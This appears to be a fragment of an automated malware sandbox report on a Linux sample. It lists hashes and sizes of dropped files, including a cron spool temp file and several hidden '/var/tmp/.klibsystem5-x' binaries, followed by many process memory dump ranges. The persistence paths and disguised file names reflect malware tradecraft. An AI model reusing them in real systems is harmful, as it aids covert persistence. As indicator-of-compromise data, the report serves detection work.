SHA512fdf13965177f4be7ccb6dc0bcda5634bbaa53abc807dee54d5b945740078e64324b5504140a6097b1d0c768759fd35d8dd02a362389489426d6e1f2330187ea6
-
/var/spool/cron/crontabs/tmp.tYsywiFilesize
231B
MD53a480a1467dfee6091881097f6d0ec0b
SHA1fac17419cf39afcc25bdd99eb3d86c3c9596511a
SHA256d09df8d28f462f1d8e414354b8d515c54db88bb03179c4cebb2ede039799753e
SHA512df0b9d2e7344ef3ce979d2c9eab90ef2899d9a7d34ed51709be613b7ceb67de0670419c33bec71f9faee0f7983b48b88a26a7c954dfcdfdceb587bd00b48c157
-
/var/tmp/.klibsystem5-xFilesize
1.1MB
MD54631ac2660619e4f1e20ec05b10eabcd
SHA14dbae80c8edc34ecef2e845dde13f86c3753b6e5
SHA256ebca0db7cc17fb41c5ee6356d355c092735c9c2ed5fe64872db141e80be1ea6a
SHA51292af9053e0ec62266ba1f301879e22c485c6d8d5b9b93383c1a99eedb28f3c2bf0643d5ec7fc2c3097628d6e3e2708c23ff75e1ba5eb415f8cdfbf690d465e1e
-
/var/tmp/.klibsystem5-xFilesize
1.6MB
MD5879335a9acf26cafe92cdf59df6fc39a
SHA15d3bfa4d6b79b67ab2fb59bb99d4d0b206b21d81
SHA256ab03394f409731b0a7925921c730908db1bf60abbfe8e91f2958adc30eed473e
SHA51244d665b487d114dfd5216ccd230d9c22f849dd77544642bdd0f7ed1e6c6f650f60c4cbae6b32d6895dd32e2c027ebd10280e8d2fdfdafbd969001df9effcbb3e
-
/var/tmp/.klibsystem5-xFilesize
1.4MB
MD5ba0c93483c7733fc6bfbb622eb01895b
SHA1bdbebf54ca600ed4196b1c8c1210931305915d31
SHA2561cac268d0e3e9d2990059ed0aeb905b7ef3e524df968d633481f569a48ac855a
SHA512c902187f3035c3f01fac5a8146e08e6139785d704060e96df76625a958f665caec4ac2deee76505b280d7259f7a8ce424e691e87e10e90ae265611985c5bdabf
-
/var/tmp/.klibsystem5-xFilesize
999KB
MD551484cd31977e7ebc25055c85e5b52b7
SHA17c25a3a2e0e56e748a592b06bdc785ae44db4e4d
SHA256b401cc0e2653c9148c36378e163844e4b2dfb62bb1a5ddc0d176c4478e41b222
SHA512103ce0ac60c720d1ef446701cab929225479ed55519450aee032b94567dbef943dcdf286acc00b2e57101ed6788c5cd0d188ebe4d3e319d85b953bc37a44eb14
-
/var/tmp/.klibsystem5-xFilesize
865KB
MD5c512df6d726ad071951899337304222a
SHA1d5e21a64088dd754c452ae055c783982381b7dbd
SHA256944543cdd4bd79280ece23f5115a2f801a6185f6b1b608546ff890f73a4c9fcd
SHA51264aa670382d21f9373f3fe2a80bb91bafea255b88fb6c8cdbfd0437d61252c0f567bc4a16d1d09d8289e2622df2ca5145f5a7b1fb5b856c692816185a1679148
-
/var/tmp/.klibsystem5-xFilesize
12KB
MD530b148220559af620d9915f8178a389d
SHA1e551d0c806d4a1fa667a8f314354b0ea8567f986
SHA256ad06755f72e315bb83b59ca1d6f4dbe31955f90b52dd4b18b49bb48a32d01740
SHA512833a49132f72cbf2debdfa2e42419d721737c1299ef6bf5c041bd536127d3ca18abc3fa57c8364fc5d1b27990fea606454c9713a608cef7ce9f3c59a69d2df8a
-
memory/1488-1-0x0000000000400000-0x0000000000b3a7e0-memory.dmp
-
memory/2152-2-0x00007f9b457c8000-0x00007f9b457dc700-memory.dmp
-
memory/2154-3-0x00007f4cb8ea8000-0x00007f4cb9566d40-memory.dmp
-
memory/2526-4-0x00007fe0bd9f7000-0x00007fe0be0b5d40-memory.dmp
-
memory/2604-5-0x0000000000400000-0x0000000000b3a7e0-memory.dmp
-
memory/2802-6-0x00007f548ae15000-0x00007f548b4d3d40-memory.dmp
-
memory/3328-9-0x00007fb4e442f000-0x00007fb4e4443700-memory.dmp
-
memory/3332-10-0x00007fd87d3f4000-0x00007fd87dab2d40-memory.dmp
-
memory/3731-11-0x00007f086fb51000-0x00007f087020fd40-memory.dmp
-
memory/3865-12-0x00007fb4865cb000-0x00007fb4865df700-memory.dmp
-
memory/3866-13-0x00007f8bf0630000-0x00007f8bf0ceed40-memory.dmp
-
memory/4212-14-0x00007fbe49ab6000-0x00007fbe4a174d40-memory.dmp
-
memory/4310-15-0x00007f3ce991d000-0x00007f3ce9931700-memory.dmp
-
memory/4311-16-0x00007fbc2f7d6000-0x00007fbc2fe94d40-memory.dmp
-
memory/4656-17-0x00007f0342e72000-0x00007f0343530d40-memory.dmp
-
memory/4756-18-0x00007f90a420b000-0x00007f90a421f700-memory.dmp
-
memory/4757-19-0x00007fc08d5d7000-0x00007fc08dc95d40-memory.dmp
-
memory/5102-20-0x00007f5fb446f000-0x00007f5fb4b2dd40-memory.dmp
-
memory/5202-21-0x00007fa9ae224000-0x00007fa9ae238700-memory.dmp
-
memory/5203-22-0x00007f538d291000-0x00007f538d94fd40-memory.dmp
-
memory/5548-23-0x00007f22da24c000-0x00007f22da90ad40-memory.dmp
-
memory/5627-24-0x0000000000400000-0x0000000000b3a7e0-memory.dmp
-
memory/5820-25-0x00007f1f458d9000-0x00007f1f458ed700-memory.dmp
-
memory/5821-26-0x00007fd2a4b14000-0x00007fd2a51d2d40-memory.dmp
-
memory/6166-27-0x00007efffe958000-0x00007effff016d40-memory.dmp
-
memory/6265-28-0x00007f1fe0d4b000-0x00007f1fe0d5f700-memory.dmp
-
memory/6266-29-0x00007ff973128000-0x00007ff9737e6d40-memory.dmp
-
memory/6611-30-0x00007f59da548000-0x00007f59dac06d40-memory.dmp
-
memory/6690-31-0x0000000000400000-0x0000000000b3a7e0-memory.dmp
-
memory/6888-32-0x00007f5e9d8af000-0x00007f5e9d8c3700-memory.dmp
-
memory/6889-33-0x00007f0b49aca000-0x00007f0b4a188d40-memory.dmp
-
memory/7234-34-0x00007f464ae88000-0x00007f464b546d40-memory.dmp
-
memory/7333-35-0x00007f3adc346000-0x00007f3adc35a700-memory.dmp
-
memory/7334-36-0x00007f1017af4000-0x00007f10181b2d40-memory.dmp
-
memory/7679-37-0x00007f19259a4000-0x00007f1926062d40-memory.dmp